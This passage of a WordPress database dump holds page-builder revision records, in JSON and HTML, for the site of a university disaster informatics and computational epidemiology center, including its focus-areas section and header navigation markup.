groups<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c9\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-04-29 09:16:29','2022-04-29 13:16:29','',168,'https://gsudice.dataconn.net/?p=1287',0,'revision','',0),(1288,1,'2022-04-29 09:16:29','2022-04-29 13:16:29','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-335 style-local-20-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-336-outer style-local-20-c4-outer\">\n <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-336 style-local-20-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-337-outer style-local-20-c5-outer\">\n <div data-colibri-id=\"20-c5\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-337 style-local-20-c5 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"20-c6\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-331 style-local-20-c6 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-333-outer style-local-20-c7-outer\">\n <div data-colibri-id=\"20-c7\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-333 style-local-20-c7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c8\" class=\"h-global-transition-all h-heading style-334 style-local-20-c8 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-334 style-local-20-c8\">\n <!---->\n <!---->\n <h1 class=\"\">Focus Areas</h1>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"20-c9\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c9 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c10-outer\">\n <div data-colibri-id=\"20-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c10 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c11\" class=\"h-icon style-274 style-local-20-c11 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c11-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c12\" class=\"h-global-transition-all h-heading style-275 style-local-20-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c12\">\n <!---->\n <!---->\n <h5 class=\"\">disease & disaster modeling</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c13\" class=\"h-text h-text-component style-276 style-local-20-c13 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c14-outer\">\n <div data-colibri-id=\"20-c14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c14 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c15\" class=\"h-icon style-274 style-local-20-c15 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c15-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c16\" class=\"h-global-transition-all h-heading style-275 style-local-20-c16 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c16\">\n <!---->\n <!---->\n <h5 class=\"\">data as a service</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c17\" class=\"h-text h-text-component style-276 style-local-20-c17 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c18-outer\">\n <div data-colibri-id=\"20-c18\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c18 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c19\" class=\"h-icon style-274 style-local-20-c19 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c19-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c20\" class=\"h-global-transition-all h-heading style-275 style-local-20-c20 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c20\">\n <!---->\n <!---->\n <h5 class=\"\">Impact assessment</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c21\" class=\"h-text h-text-component style-276 style-local-20-c21 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-04-29 09:16:29','2022-04-29 13:16:29','',20,'https://gsudice.dataconn.net/?p=1288',0,'revision','',0),(1289,1,'2022-04-29 09:16:29','2022-04-29 13:16:29','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>© 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics & Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment & Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":678,\"type\":\"header\",\"props\":{\"text\":\"our mission\",\"link\":{\"value\":\"\"}}}],\"slot\":null,\"parentId\":\"22-h26\",\"index\":2,\"id\":\"22-h29\",\"partialId\":22,\"styleRef\":677,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h31\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h33\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h37\",\"parentId\":\"22-h36\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h36\",\"parentId\":\"22-h35\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h38\",\"parentId\":\"22-h35\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h35\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-04-29 09:16:29','2022-04-29 13:16:29','',23,'https://gsudice.dataconn.net/?p=1289',0,'revision','',0),(1290,1,'2022-04-29 09:16:29','2022-04-29 13:16:29','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n <!---->\n <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n <!---->\n <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <div data-nav-normal=\"\">\n <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n <!---->\n <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n <div class=\"icon-container h-hamburger-icon\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n <!---->\n <div class=\"offscreen-header h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"offscreen-content\">\n <!---->\n <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 